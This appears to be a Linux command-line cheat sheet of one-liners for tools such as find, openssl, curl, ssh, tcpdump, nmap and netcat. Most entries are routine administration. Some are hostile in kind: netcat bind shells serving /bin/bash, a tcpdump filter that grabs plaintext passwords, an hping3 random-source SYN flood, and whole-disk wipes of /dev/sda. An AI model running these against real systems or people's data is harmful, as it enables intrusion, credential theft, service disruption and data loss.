find . -type f -mtime +60 -delete
Recursively remove all empty sub-directories from a directory
find . -depth  -type d  -empty -exec rmdir {} \;
How to find all hard links to a file
find </path/to/dir> -xdev -samefile filename
Recursively find the latest modified files
find . -type f -exec stat --format '%Y :%y %n' "{}" \; | sort -nr | cut -d: -f2- | head
Recursively find/replace of a string with sed
find . -not -path '*/\.git*' -type f -print0 | xargs -0 sed -i 's/foo/bar/g'
Recursively find/replace of a string in directories and file names
find . -depth -name '*test*' -execdir bash -c 'mv -v "$1" "${1//foo/bar}"' _ {} \;
Recursively find suid executables
find / \( -perm -4000 -o -perm -2000 \) -type f -exec ls -la {} \;

Tool: top
Use top to monitor only all processes with the specific string
top -p $(pgrep -d , <str>)
  • <str>
    - process containing string (eg. nginx, worker)

Tool: vmstat
Show current system utilization (fields in kilobytes)
vmstat 2 20 -t -w
  • 2
    - number of times with a defined time interval (delay)
  • 20
    - each execution of the command (count)
  • -t
    - show timestamp
  • -w
    - wide output
  • -S M
    - output of the fields in megabytes instead of kilobytes
Show current system utilization will get refreshed every 5 seconds
vmstat 5 -w
Display report a summary of disk operations
vmstat -D
Display report of event counters and memory stats
vmstat -s
Display report about kernel objects stored in slab layer cache
vmstat -m
Tool: iostat
Show information about the CPU usage, and I/O statistics about all the partitions
iostat 2 10 -t -m
  • 2
    - number of times with a defined time interval (delay)
  • 10
    - each execution of the command (count)
  • -t
    - show timestamp
  • -m
    - fields in megabytes ( - in kilobytes, default)
    -k
Show information only about the CPU utilization
iostat 2 10 -t -m -c
Show information only about the disk utilization
iostat 2 10 -t -m -d
Show information only about the LVM utilization
iostat -N

Tool: strace
Track with child processes
# 1)
strace -f -p $(pidof glusterfsd)

# 2)
strace -f $(pidof php-fpm | sed 's/\([0-9]*\)/\-p \1/g')
Track process with 30 seconds limit
timeout 30 strace $(< /var/run/zabbix/zabbix_agentd.pid)
Track processes and redirect output to a file
ps auxw | grep '[a]pache' | awk '{print " -p " $2}' | \
xargs strace -o /tmp/strace-apache-proc.out
Track with print time spent in each syscall and limit length of print strings
ps auxw | grep '[i]init_policy' | awk '{print " -p " $2}' | \
xargs strace -f -e trace=network -T -s 10000
Track the open request of a network port
strace -f -e trace=bind nc -l 80
Track the open request of a network port (show TCP/UDP)
strace -f -e trace=network nc -lu 80

Tool: kill
Kill a process running on port
kill -9 $(lsof -i :<port> | awk '{l=$2} END {print l}')

Tool: diff
Compare two directory trees
diff <(cd directory1 && find | sort) <(cd directory2 && find | sort)
Compare output of two commands
diff <(cat /etc/passwd) <(cut -f2 /etc/passwd)

Tool: vimdiff
Highlight the exact differences, based on characters and words
vimdiff file1 file2
Compare two JSON files
vimdiff <(jq -S . A.json) <(jq -S . B.json)
Compare Hex dump
d(){ vimdiff <(f $1) <(f $2);};f(){ hexdump -C $1 | cut -d' ' -f3- | tr -s ' ';}; d ~/bin1 ~/bin2
diffchar

Save diffchar @

~/.vim/plugins

Click to switch between diff modes

F7

Usefull commands:

vimdiff

  • qa
    to exit all windows
  • :vertical resize 70
    to resize window
  • set window width
    Ctrl+W [N columns]+(Shift+)<\>

Tool: tail
Annotate tail -f with timestamps
tail -f file | while read ; do echo "$(date +%T.%N) $REPLY" ; done
Analyse an Apache access log for the most common IP addresses
tail -10000 access_log | awk '{print $1}' | sort | uniq -c | sort -n | tail
Analyse web server log and show only 5xx http codes
tail -n 100 -f /path/to/logfile | grep "HTTP/[1-2].[0-1]\" [5]"

Tool: tar
System backup with exclude specific directories
cd /
tar -czvpf /mnt/system$(date +%d%m%Y%s).tgz --directory=/ \
--exclude=proc/* --exclude=sys/* --exclude=dev/* --exclude=mnt/* .
System backup with exclude specific directories (pigz)
cd /
tar cvpf /backup/snapshot-$(date +%d%m%Y%s).tgz --directory=/ \
--exclude=proc/* --exclude=sys/* --exclude=dev/* \
--exclude=mnt/* --exclude=tmp/* --use-compress-program=pigz .

Tool: dump
System backup to file
dump -y -u -f /backup/system$(date +%d%m%Y%s).lzo /
Restore system from lzo file
cd /
restore -rf /backup/system$(date +%d%m%Y%s).lzo

Tool: cpulimit
Limit the cpu usage of a process
cpulimit -p pid -l 50

Tool: pwdx
Show current working directory of a process
pwdx <pid>

Tool: taskset
Start a command on only one CPU core
taskset -c 0 <command>

Tool: tr
Show directories in the PATH, one per line
tr : '\n' <<<$PATH

Tool: chmod
Remove executable bit from all files in the current directory
chmod -R -x+X *
Restore permission for /bin/chmod
# 1:
cp /bin/ls chmod.01
cp /bin/chmod chmod.01
./chmod.01 700 file

# 2:
/bin/busybox chmod 0700 /bin/chmod

# 3:
setfacl --set u::rwx,g::---,o::--- /bin/chmod

Tool: who
Find last reboot time
who -b
Detect a user sudo-su'd into the current shell
[[ $(who -m | awk '{ print $1 }') == $(whoami) ]] || echo "You are su-ed to $(whoami)"

Tool: last
Was the last reboot a panic?
(last -x -f $(ls -1t /var/log/wtmp* | head -2 | tail -1); last -x -f /var/log/wtmp) | \
grep -A1 reboot | head -2 | grep -q shutdown && echo "Expected reboot" || echo "Panic reboot"

Tool: screen
Start screen in detached mode
screen -d -m <command>
Attach to an existing screen session
screen -r -d <pid>

Tool: script
Record and replay terminal session
### Record session
# 1)
script -t 2>~/session.time -a ~/session.log

# 2)
script --timing=session.time session.log

### Replay session
scriptreplay --timing=session.time session.log

Tool: du
Show 20 biggest directories with 'K M G'
du | \
sort -r -n | \
awk '{split("K M G",v); s=1; while($1>1024){$1/=1024; s++} print int($1)" "v[s]"\t"$2}' | \
head -n 20

Tool: inotifywait
Init tool everytime a file in a directory is modified
while true ; do inotifywait -r -e MODIFY dir/ && ls dir/ ; done;

Tool: openssl
Testing connection to the remote host
echo | openssl s_client -connect google.com:443 -showcerts
Testing connection to the remote host (debug mode)
echo | openssl s_client -connect google.com:443 -showcerts -tlsextdebug -status
Testing connection to the remote host (with SNI support)
echo | openssl s_client -showcerts -servername google.com -connect google.com:443
Testing connection to the remote host with specific ssl version
openssl s_client -tls1_2 -connect google.com:443
Testing connection to the remote host with specific ssl cipher
openssl s_client -cipher 'AES128-SHA' -connect google.com:443
Verify 0-RTT
_host="example.com"

cat > req.in << __EOF__
HEAD / HTTP/1.1
Host: $_host
Connection: close
__EOF__

openssl s_client -connect ${_host}:443 -tls1_3 -sess_out session.pem -ign_eof < req.in
openssl s_client -connect ${_host}:443 -tls1_3 -sess_in session.pem -early_data req.in
Generate private key without passphrase
# _len: 2048, 4096
( _fd="private.key" ; _len="2048" ; \
openssl genrsa -out ${_fd} ${_len} )
Generate private key with passphrase
# _ciph: aes128, aes256
# _len: 2048, 4096
( _ciph="aes128" ; _fd="private.key" ; _len="2048" ; \
openssl genrsa -${_ciph} -out ${_fd} ${_len} )
Remove passphrase from private key
( _fd="private.key" ; _fd_unp="private_unp.key" ; \
openssl rsa -in ${_fd} -out ${_fd_unp} )
Encrypt existing private key with a passphrase
# _ciph: aes128, aes256
( _ciph="aes128" ; _fd="private.key" ; _fd_pass="private_pass.key" ; \
openssl rsa -${_ciph} -in ${_fd} -out ${_fd_pass}
Check private key
( _fd="private.key" ; \
openssl rsa -check -in ${_fd} )
Get public key from private key
( _fd="private.key" ; _fd_pub="public.key" ; \
openssl rsa -pubout -in ${_fd} -out ${_fd_pub} )
Generate private key and CSR
( _fd="private.key" ; _fd_csr="request.csr" ; _len="2048" ; \
openssl req -out ${_fd_csr} -new -newkey rsa:${_len} -nodes -keyout ${_fd} )
Generate CSR
( _fd="private.key" ; _fd_csr="request.csr" ; \
openssl req -out ${_fd_csr} -new -key ${_fd} )
Generate CSR (metadata from existing certificate)

Where is the existing private key. As you can see you do not generate this CSR from your certificate (public key). Also you do not generate the "same" CSR, just a new one to request a new certificate.

private.key

( _fd="private.key" ; _fd_csr="request.csr" ; _fd_crt="cert.crt" ; \
openssl x509 -x509toreq -in ${_fd_crt} -out ${_fd_csr} -signkey ${_fd} )
Generate CSR with -config param
( _fd="private.key" ; _fd_csr="request.csr" ; \
openssl req -new -sha256 -key ${_fd} -out ${_fd_csr} \
-config <(
cat << __EOF__
[req]
default_bits        = 2048
default_md          = sha256
prompt              = no
distinguished_name  = dn
req_extensions      = req_ext

[ dn ]
C   = "<two-letter ISO abbreviation for your country>"
ST  = "<state or province where your organisation is legally located>"
L   = "<city where your organisation is legally located>"
O   = "<legal name of your organisation>"
OU  = "<section of the organisation>"
CN  = "<fully qualified domain name>"

[ req_ext ]
subjectAltName = @alt_names

[ alt_names ]
DNS.1 = <fully qualified domain name>
DNS.2 = <next domain>
DNS.3 = <next domain>
__EOF__
))

Other values in :

[ dn ]

countryName            = "DE"                     # C=
stateOrProvinceName    = "Hessen"                 # ST=
localityName           = "Keller"                 # L=
postalCode             = "424242"                 # L/postalcode=
postalAddress          = "Keller"                 # L/postaladdress=
streetAddress          = "Crater 1621"            # L/street=
organizationName       = "apfelboymschule"        # O=
organizationalUnitName = "IT Department"          # OU=
commonName             = "example.com"            # CN=
emailAddress           = "webmaster@example.com"  # CN/emailAddress=

Example of (you'll probably also have to make OpenSSL know about the new fields required for EV by adding the following under ):

oids
[new_oids]

[req]
...
oid_section         = new_oids

[ new_oids ]
postalCode = 2.5.4.17
streetAddress = 2.5.4.9

Full example:

( _fd="private.key" ; _fd_csr="request.csr" ; \
openssl req -new -sha256 -key ${_fd} -out ${_fd_csr} \
-config <(
cat << __EOF__
[req]
default_bits        = 2048
default_md          = sha256
prompt              = no
distinguished_name  = dn
req_extensions      = req_ext
oid_section         = new_oids

[ new_oids ]
serialNumber = 2.5.4.5
streetAddress = 2.5.4.9
postalCode = 2.5.4.17
businessCategory = 2.5.4.15

[ dn ]
serialNumber=00001111
businessCategory=Private Organization
jurisdictionC=DE
C=DE
ST=Hessen
L=Keller
postalCode=424242
streetAddress=Crater 1621
O=AV Company
OU=IT
CN=example.com

[ req_ext ]
subjectAltName = @alt_names

[ alt_names ]
DNS.1 = example.com
__EOF__
))

For more information please look at these great explanations:

List available EC curves
openssl ecparam -list_curves
Print ECDSA private and public keys
( _fd="private.key" ; \
openssl ec -in ${_fd} -noout -text )

# For x25519 only extracting public key
( _fd="private.key" ; _fd_pub="public.key" ; \
openssl pkey -in ${_fd} -pubout -out ${_fd_pub} )
Generate ECDSA private key
# _curve: prime256v1, secp521r1, secp384r1
( _fd="private.key" ; _curve="prime256v1" ; \
openssl ecparam -out ${_fd} -name ${_curve} -genkey )

# _curve: X25519
( _fd="private.key" ; _curve="x25519" ; \
openssl genpkey -algorithm ${_curve} -out ${_fd} )
Generate private key and CSR (ECC)
# _curve: prime256v1, secp521r1, secp384r1
( _fd="domain.com.key" ; _fd_csr="domain.com.csr" ; _curve="prime256v1" ; \
openssl ecparam -out ${_fd} -name ${_curve} -genkey ; \
openssl req -new -key ${_fd} -out ${_fd_csr} -sha256 )
Generate self-signed certificate
# _len: 2048, 4096
( _fd="domain.key" ; _fd_out="domain.crt" ; _len="2048" ; _days="365" ; \
openssl req -newkey rsa:${_len} -nodes \
-keyout ${_fd} -x509 -days ${_days} -out ${_fd_out} )
Generate self-signed certificate from existing private key
# _len: 2048, 4096
( _fd="domain.key" ; _fd_out="domain.crt" ; _days="365" ; \
openssl req -key ${_fd} -nodes \
-x509 -days ${_days} -out ${_fd_out} )
Generate self-signed certificate from existing private key and csr
# _len: 2048, 4096
( _fd="domain.key" ; _fd_csr="domain.csr" ; _fd_out="domain.crt" ; _days="365" ; \
openssl x509 -signkey ${_fd} -nodes \
-in ${_fd_csr} -req -days ${_days} -out ${_fd_out} )
Generate DH public parameters
( _dh_size="2048" ; \
openssl dhparam -out /etc/nginx/ssl/dhparam_${_dh_size}.pem "$_dh_size" )
Display DH public parameters
openssl pkeyparam -in dhparam.pem -text
Extract private key from pfx
( _fd_pfx="cert.pfx" ; _fd_key="key.pem" ; \
openssl pkcs12 -in ${_fd_pfx} -nocerts -nodes -out ${_fd_key} )
Extract private key and certs from pfx
( _fd_pfx="cert.pfx" ; _fd_pem="key_certs.pem" ; \
openssl pkcs12 -in ${_fd_pfx} -nodes -out ${_fd_pem} )
Extract certs from p7b
# PKCS#7 file doesn't include private keys.
( _fd_p7b="cert.p7b" ; _fd_pem="cert.pem" ; \
openssl pkcs7 -inform DER -outform PEM -in ${_fd_p7b} -print_certs > ${_fd_pem})
# or:
openssl pkcs7 -print_certs -in -in ${_fd_p7b} -out ${_fd_pem})
Convert DER to PEM
( _fd_der="cert.crt" ; _fd_pem="cert.pem" ; \
openssl x509 -in ${_fd_der} -inform der -outform pem -out ${_fd_pem} )
Convert PEM to DER
( _fd_der="cert.crt" ; _fd_pem="cert.pem" ; \
openssl x509 -in ${_fd_pem} -outform der -out ${_fd_der} )
Verification of the private key
( _fd="private.key" ; \
openssl rsa -noout -text -in ${_fd} )
Verification of the public key
# 1)
( _fd="public.key" ; \
openssl pkey -noout -text -pubin -in ${_fd} )

# 2)
( _fd="private.key" ; \
openssl rsa -inform PEM -noout -in ${_fd} &> /dev/null ; \
if [ $? = 0 ] ; then echo -en "OK\n" ; fi )
Verification of the certificate
( _fd="certificate.crt" ; # format: pem, cer, crt \
openssl x509 -noout -text -in ${_fd} )
Verification of the CSR
( _fd_csr="request.csr" ; \
openssl req -text -noout -in ${_fd_csr} )
Check the private key and the certificate are match
(openssl rsa -noout -modulus -in private.key | openssl md5 ; \
openssl x509 -noout -modulus -in certificate.crt | openssl md5) | uniq
Check the private key and the CSR are match
(openssl rsa -noout -modulus -in private.key | openssl md5 ; \
openssl req -noout -modulus -in request.csr | openssl md5) | uniq

Tool: secure-delete
Secure delete with shred
shred -vfuz -n 10 file
shred --verbose --random-source=/dev/urandom -n 1 /dev/sda
Secure delete with scrub
scrub -p dod /dev/sda
scrub -p dod -r file
Secure delete with badblocks
badblocks -s -w -t random -v /dev/sda
badblocks -c 10240 -s -w -t random -v /dev/sda
Secure delete with secure-delete
srm -vz /tmp/file
sfill -vz /local
sdmem -v
swapoff /dev/sda5 && sswap -vz /dev/sda5

Tool: dd
Show dd status every so often
dd <dd_params> status=progress
watch --interval 5 killall -USR1 dd
Redirect output to a file with dd
echo "string" | dd of=filename

Tool: gpg
Export public key
gpg --export --armor "<username>" > username.pkey
  • --export
    - export all keys from all keyrings or specific key
  • -a|--armor
    - create ASCII armored output
Encrypt file
gpg -e -r "<username>" dump.sql
  • -e|--encrypt
    - encrypt data
  • -r|--recipient
    - encrypt for specific
Decrypt file
gpg -o dump.sql -d dump.sql.gpg
  • -o|--output
    - use as output file
  • -d|--decrypt
    - decrypt data (default)
Search recipient
gpg --keyserver hkp://keyserver.ubuntu.com --search-keys "<username>"
  • --keyserver
    - set specific key server
  • --search-keys
    - search for keys on a key server
List all of the packets in an encrypted file
gpg --batch --list-packets archive.gpg
gpg2 --batch --list-packets archive.gpg

Tool: system-other
Reboot system from init
exec /sbin/init 6
Init system from single user mode
exec /sbin/init
Show current working directory of a process
readlink -f /proc/<PID>/cwd
Show actual pathname of the executed command
readlink -f /proc/<PID>/exe
Tool: curl
curl -Iks https://www.google.com
  • -I
    - show response headers only
  • -k
    - insecure connection when using ssl
  • -s
    - silent mode (not display body)
curl -Iks --location -X GET -A "x-agent" https://www.google.com
  • --location
    - follow redirects
  • -X
    - set method
  • -A
    - set user-agent
curl -Iks --location -X GET -A "x-agent" --proxy http://127.0.0.1:16379 https://www.google.com
  • --proxy [socks5://|http://]
    - set proxy server
curl -o file.pdf -C - https://example.com/Aiju2goo0Ja2.pdf
  • -o
    - write output to file
  • -C
    - resume the transfer
Find your external IP address (external services)
curl ipinfo.io
curl ipinfo.io/ip
curl icanhazip.com
curl ifconfig.me/ip ; echo
Repeat URL request
# URL sequence substitution with a dummy query string:
curl -ks https://example.com/?[1-20]

# With shell 'for' loop:
for i in {1..20} ; do curl -ks https://example.com/ ; done
Check DNS and HTTP trace with headers for specific domains
### Set domains and external dns servers.
_domain_list=(google.com) ; _dns_list=("8.8.8.8" "1.1.1.1")

for _domain in "${_domain_list[@]}" ; do

  printf '=%.0s' {1..48}

  echo

  printf "[\\e[1;32m+\\e[m] resolve: %s\\n" "$_domain"

  for _dns in "${_dns_list[@]}" ; do

    # Resolve domain.
    host "${_domain}" "${_dns}"

    echo

  done

  for _proto in http https ; do

    printf "[\\e[1;32m+\\e[m] trace + headers: %s://%s\\n" "$_proto" "$_domain"

    # Get trace and http headers.
    curl -Iks -A "x-agent" --location "${_proto}://${_domain}"

    echo

  done

done

unset _domain_list _dns_list

Tool: httpie
http -p Hh https://www.google.com
  • -p
    - print request and response headers
    • H
      - request headers
    • B
      - request body
    • h
      - response headers
    • b
      - response body
http -p Hh https://www.google.com --follow --verify no
  • -F, --follow
    - follow redirects
  • --verify no
    - skip SSL verification
http -p Hh https://www.google.com --follow --verify no \
--proxy http:http://127.0.0.1:16379
  • --proxy [http:]
    - set proxy server
Tool: ssh
Escape Sequence
# Supported escape sequences:
~.  - terminate connection (and any multiplexed sessions)
~B  - send a BREAK to the remote system
~C  - open a command line
~R  - Request rekey (SSH protocol 2 only)
~^Z - suspend ssh
~#  - list forwarded connections
~&  - background ssh (when waiting for connections to terminate)
~?  - this message
~~  - send the escape character by typing it twice
Compare a remote file with a local file
ssh user@host cat /path/to/remotefile | diff /path/to/localfile -
SSH connection through host in the middle
ssh -t reachable_host ssh unreachable_host
Run command over SSH on remote host
cat > cmd.txt << __EOF__
cat /etc/hosts
__EOF__

ssh host -l user $(<cmd.txt)
Get public key from private key
ssh-keygen -y -f ~/.ssh/id_rsa
Get all fingerprints
ssh-keygen -l -f .ssh/known_hosts
SSH authentication with user password
ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no user@remote_host
SSH authentication with publickey
ssh -o PreferredAuthentications=publickey -o PubkeyAuthentication=yes -i id_rsa user@remote_host
Simple recording SSH session
function _ssh_sesslog() {

  _sesdir="<path/to/session/logs>"

  mkdir -p "${_sesdir}" && \
  ssh $@ 2>&1 | tee -a "${_sesdir}/$(date +%Y%m%d).log"

}

# Alias:
alias ssh='_ssh_sesslog'
Using Keychain for SSH logins
### Delete all of ssh-agent's keys.
function _scl() {

  /usr/bin/keychain --clear

}

### Add key to keychain.
function _scg() {

  /usr/bin/keychain /path/to/private-key
  source "$HOME/.keychain/$HOSTNAME-sh"

}
SSH login without processing any login scripts
ssh -tt user@host bash
SSH local port forwarding

Example 1:

# Forwarding our local 2250 port to nmap.org:443 from localhost through localhost
host1> ssh -L 2250:nmap.org:443 localhost

# Connect to the service:
host1> curl -Iks --location -X GET https://localhost:2250

Example 2:

# Forwarding our local 9051 port to db.d.x:5432 from localhost through node.d.y
host1> ssh -nNT -L 9051:db.d.x:5432 node.d.y

# Connect to the service:
host1> psql -U db_user -d db_dev -p 9051 -h localhost
  • -n
    - redirects stdin from
    /dev/null
  • -N
    - do not execute a remote command
  • -T
    - disable pseudo-terminal allocation
SSH remote port forwarding
# Forwarding our local 9051 port to db.d.x:5432 from host2 through node.d.y
host1> ssh -nNT -R 9051:db.d.x:5432 node.d.y

# Connect to the service:
host2> psql -U postgres -d postgres -p 8000 -h localhost

Tool: linux-dev
Testing remote connection to port
timeout 1 bash -c "</dev/<proto>/<host>/<port>" >/dev/null 2>&1 ; echo $?
  • <proto
    - set protocol (tcp/udp)
  • <host>
    - set remote host
  • <port>
    - set destination port
Read and write to TCP or UDP sockets with common bash tools
exec 5<>/dev/tcp/<host>/<port>; cat <&5 & cat >&5; exec 5>&-

Tool: tcpdump
Filter incoming (on interface) traffic (specific ip:port)
tcpdump -ne -i eth0 -Q in host 192.168.252.1 and port 443
  • -n
    - don't convert addresses ( will not resolve hostnames or ports)
    -nn
  • -e
    - print the link-level headers
  • -i [iface|any]
    - set interface
  • -Q|-D [in|out|inout]
    - choose send/receive direction ( - for old tcpdump versions)
    -D
  • host [ip|hostname]
    - set host, also
    [host not]
  • [and|or]
    - set logic
  • port [1-65535]
    - set port number, also
    [port not]
Filter incoming (on interface) traffic (specific ip:port) and write to a file
tcpdump -ne -i eth0 -Q in host 192.168.252.1 and port 443 -c 5 -w tcpdump.pcap
  • -c [num]
    - capture only num number of packets
  • -w [filename]
    - write packets to file, - reading from file
    -r [filename]
Capture all ICMP packets
tcpdump -nei eth0 icmp
Check protocol used (TCP or UDP) for service
tcpdump -nei eth0 tcp port 22 -vv -X | egrep "TCP|UDP"
Display ASCII text (to parse the output using grep or other)
tcpdump -i eth0 -A -s0 port 443
Grab everything between two keywords
tcpdump -i eth0 port 80 -X | sed -n -e '/username/,/=ldap/ p'
Grab user and pass ever plain http
tcpdump -i eth0  port http -l -A | egrep -i \
'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' \
--color=auto --line-buffered -B20
Extract HTTP User Agent from HTTP request header
tcpdump -ei eth0 -nn -A -s1500 -l | grep "User-Agent:"
Capture only HTTP GET and POST packets
tcpdump -ei eth0 -s 0 -A -vv \
'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420' or 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354'

or simply:

tcpdump -ei eth0 -s 0 -v -n -l | egrep -i "POST /|GET /|Host:"
Rotate capture files
tcpdump -ei eth0 -w /tmp/capture-%H.pcap -G 3600 -C 200
  • -G <num>
    - pcap will be created every seconds
    <num>
  • -C <size>
    - close the current pcap and open a new one if is larger than
    <size>
Top hosts by packets
tcpdump -ei enp0s25 -nnn -t -c 200 | cut -f 1,2,3,4 -d '.' | sort | uniq -c | sort -nr | head -n 20
Excludes any RFC 1918 private address
tcpdump -nei eth0 'not (src net (10 or 172.16/12 or 192.168/16) and dst net (10 or 172.16/12 or 192.168/16))'

Tool: tcpick
Analyse packets in real-time
while true ; do tcpick -a -C -r dump.pcap ; sleep 2 ; clear ; done

Tool: ngrep
ngrep -d eth0 "www.domain.com" port 443
  • -d [iface|any]
    - set interface
  • [domain]
    - set hostname
  • port [1-65535]
    - set port number
ngrep -d eth0 "www.domain.com" src host 10.240.20.2 and port 443
  • (host [ip|hostname])
    - filter by ip or hostname
  • (port [1-65535])
    - filter by port number
ngrep -d eth0 -qt -O ngrep.pcap "www.domain.com" port 443
  • -q
    - quiet mode (only payloads)
  • -t
    - added timestamps
  • -O [filename]
    - save output to file, - reading from file
    -I [filename]
ngrep -d eth0 -qt 'HTTP' 'tcp'
  • HTTP
    - show http headers
  • tcp|udp
    - set protocol
  • [src|dst] host [ip|hostname]
    - set direction for specific node
ngrep -l -q -d eth0 -i "User-Agent: curl*"
  • -l
    - stdout line buffered
  • -i
    - case-insensitive search

Tool: hping3
hping3 -V -p 80 -s 5050 <scan_type> www.google.com
  • -V|--verbose
    - verbose mode
  • -p|--destport
    - set destination port
  • -s|--baseport
    - set source port
  • <scan_type>
    - set scan type
    • -F|--fin
      - set FIN flag, port open if no reply
    • -S|--syn
      - set SYN flag
    • -P|--push
      - set PUSH flag
    • -A|--ack
      - set ACK flag (use when ping is blocked, RST response back if the port is open)
    • -U|--urg
      - set URG flag
    • -Y|--ymas
      - set Y unused flag (0x80 - nullscan), port open if no reply
    • -M 0 -UPF
      - set TCP sequence number and scan type (URG+PUSH+FIN), port open if no reply
hping3 -V -c 1 -1 -C 8 www.google.com
  • -c [num]
    - packet count
  • -1
    - set ICMP mode
  • -C|--icmptype [icmp-num]
    - set icmp type (default icmp-echo = 8)
hping3 -V -c 1000000 -d 120 -S -w 64 -p 80 --flood --rand-source <remote_host>
  • --flood
    - sent packets as fast as possible (don't show replies)
  • --rand-source
    - random source address mode
  • -d --data
    - data size
  • -w|--win
    - winsize (default 64)

Tool: nmap
Ping scans the network
nmap -sP 192.168.0.0/24
Show only open ports
nmap -F --open 192.168.0.0/24
Full TCP port scan using with service version detection
nmap -p 1-65535 -sV -sS -T4 192.168.0.0/24
Nmap scan and pass output to Nikto
nmap -p80,443 192.168.0.0/24 -oG - | nikto.pl -h -
Recon specific ip:service with Nmap NSE scripts stack
# Set variables:
_hosts="192.168.250.10"
_ports="80,443"

# Set Nmap NSE scripts stack:
_nmap_nse_scripts="+dns-brute,\
                   +http-auth-finder,\
                   +http-chrono,\
                   +http-cookie-flags,\
                   +http-cors,\
                   +http-cross-domain-policy,\
                   +http-csrf,\
                   +http-dombased-xss,\
                   +http-enum,\
                   +http-errors,\
                   +http-git,\
                   +http-grep,\
                   +http-internal-ip-disclosure,\
                   +http-jsonp-detection,\
                   +http-malware-host,\
                   +http-methods,\
                   +http-passwd,\
                   +http-phpself-xss,\
                   +http-php-version,\
                   +http-robots.txt,\
                   +http-sitemap-generator,\
                   +http-shellshock,\
                   +http-stored-xss,\
                   +http-title,\
                   +http-unsafe-output-escaping,\
                   +http-useragent-tester,\
                   +http-vhosts,\
                   +http-waf-detect,\
                   +http-waf-fingerprint,\
                   +http-xssed,\
                   +traceroute-geolocation.nse,\
                   +ssl-enum-ciphers,\
                   +whois-domain,\
                   +whois-ip"

# Set Nmap NSE script params:
_nmap_nse_scripts_args="dns-brute.domain=${_hosts},http-cross-domain-policy.domain-lookup=true,"
_nmap_nse_scripts_args+="http-waf-detect.aggro,http-waf-detect.detectBodyChanges,"
_nmap_nse_scripts_args+="http-waf-fingerprint.intensive=1"

# Perform scan:
nmap --script="$_nmap_nse_scripts" --script-args="$_nmap_nse_scripts_args" -p "$_ports" "$_hosts"

Tool: netcat
nc -kl 5000
  • -l
    - listen for an incoming connection
  • -k
    - listening after client has disconnected
  • >filename.out
    - save receive data to file (optional)
nc 192.168.0.1 5051 < filename.in
  • < filename.in
    - send data to remote host
nc -vz 10.240.30.3 5000
  • -v
    - verbose output
  • -z
    - scan for listening daemons
nc -vzu 10.240.30.3 1-65535
  • -u
    - scan only udp ports
Transfer data file (archive)
server> nc -l 5000 | tar xzvfp -
client> tar czvfp - /path/to/dir | nc 10.240.30.3 5000
Launch remote shell
# 1)
server> nc -l 5000 -e /bin/bash
client> nc 10.240.30.3 5000

# 2)
server> rm -f /tmp/f; mkfifo /tmp/f
server> cat /tmp/f | /bin/bash -i 2>&1 | nc -l 127.0.0.1 5000 > /tmp/f
client> nc 10.240.30.3 5000
Simple file server
while true ; do nc -l 5000 | tar -xvf - ; done
Simple minimal HTTP Server
while true ; do nc -l -p 1500 -c 'echo -e "HTTP/1.1 200 OK\n\n $(date)"' ; done
Simple HTTP Server

Restarts web server after each request - remove condition for only single connection.

while

cat > index.html << __EOF__
<!doctype html>
    <head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <title></title>
        <meta name="description" content="">
        <meta name="viewport" content="width=device-width, initial-scale=1">
    </head>
    <body>

    <p>

      Hello! It's a site.

    </p>

    </body>
</html>
__EOF__
server> while : ; do \
(echo -ne "HTTP/1.1 200 OK\r\nContent-Length: $(wc -c <index.html)\r\n\r\n" ; cat index.html;) | \
nc -l -p 5000 \
; done
  • -p
    - port number
Simple HTTP Proxy (single connection)
#!/usr/bin/env bash

if [[ $# != 2 ]] ; then
  printf "%s\\n" \
         "usage: ./nc-proxy listen-port bk_host:bk_port"
fi

_listen_port="$1"
_bk_host=$(echo "$2" | cut -d ":" -f1)
_bk_port=$(echo "$2" | cut -d ":" -f2)

printf "  lport: %s\\nbk_host: %s\\nbk_port: %s\\n\\n" \
       "$_listen_port" "$_bk_host" "$_bk_port"

_tmp=$(mktemp -d)
_back="$_tmp/pipe.back"
_sent="$_tmp/pipe.sent"
_recv="$_tmp/pipe.recv"

trap 'rm -rf "$_tmp"' EXIT

mkfifo -m 0600 "$_back" "$_sent" "$_recv"

sed "s/^/=> /" <"$_sent" &
sed "s/^/<=  /" <"$_recv" &

nc -l -p "$_listen_port" <"$_back" | \
tee "$_sent" | \
nc "$_bk_host" "$_bk_port" | \
tee "$_recv" >"$_back"
server> chmod +x nc-proxy && ./nc-proxy 8080 192.168.252.10:8000
  lport: 8080
bk_host: 192.168.252.10
bk_port: 8000

client> http -p h 10.240.30.3:8080
HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Content-Length: 2748
Content-Type: text/html; charset=utf-8
Date: Sun, 01 Jul 2018 20:12:08 GMT
Last-Modified: Sun, 01 Apr 2018 21:53:37 GMT
Create a single-use TCP or UDP proxy
### TCP -> TCP
nc -l -p 2000 -c "nc [ip|hostname] 3000"

### TCP -> UDP
nc -l -p 2000 -c "nc -u [ip|hostname] 3000"

### UDP -> UDP
nc -l -u -p 2000 -c "nc -u [ip|hostname] 3000"

### UDP -> TCP
nc -l -u -p 2000 -c "nc [ip|hostname] 3000"

Tool: gnutls-cli
Testing connection to remote host (with SNI support)
gnutls-cli -p 443 google.com
Testing connection to remote host (without SNI support)
gnutls-cli --disable-sni -p 443 google.com

Tool: socat
Testing remote connection to port
socat - TCP4:10.240.30.3:22
  • -
    - standard input (STDIO)
  • TCP4:<params>
    - set tcp4 connection with specific params
    • [hostname|ip]
      - set hostname/ip
    • [1-65535]
      - set port number
Redirecting TCP-traffic to a UNIX domain socket under Linux
socat TCP-LISTEN:1234,bind=127.0.0.1,reuseaddr,fork,su=nobody,range=127.0.0.0/8 UNIX-CLIENT:/tmp/foo
  • TCP-LISTEN:<params>
    - set tcp listen with specific params
    • [1-65535]
      - set port number
    • bind=[hostname|ip]
      - set bind hostname/ip
    • reuseaddr
      - allows other sockets to bind to an address
    • fork
      - keeps the parent process attempting to produce more connections
    • su=nobody
      - set user
    • range=[ip-range]
      - ip range
  • UNIX-CLIENT:<params>
    - communicates with the specified peer socket
    • filename
      - define socket

Tool: p0f
Set iface in promiscuous mode and dump traffic to the log file
p0f -i enp0s25 -p -d -o /dump/enp0s25.log
  • -i
    - listen on the specified interface
  • -p
    - set interface in promiscuous mode
  • -d
    - fork into background
  • -o
    - output file

Tool: netstat
Graph # of connections for each hosts
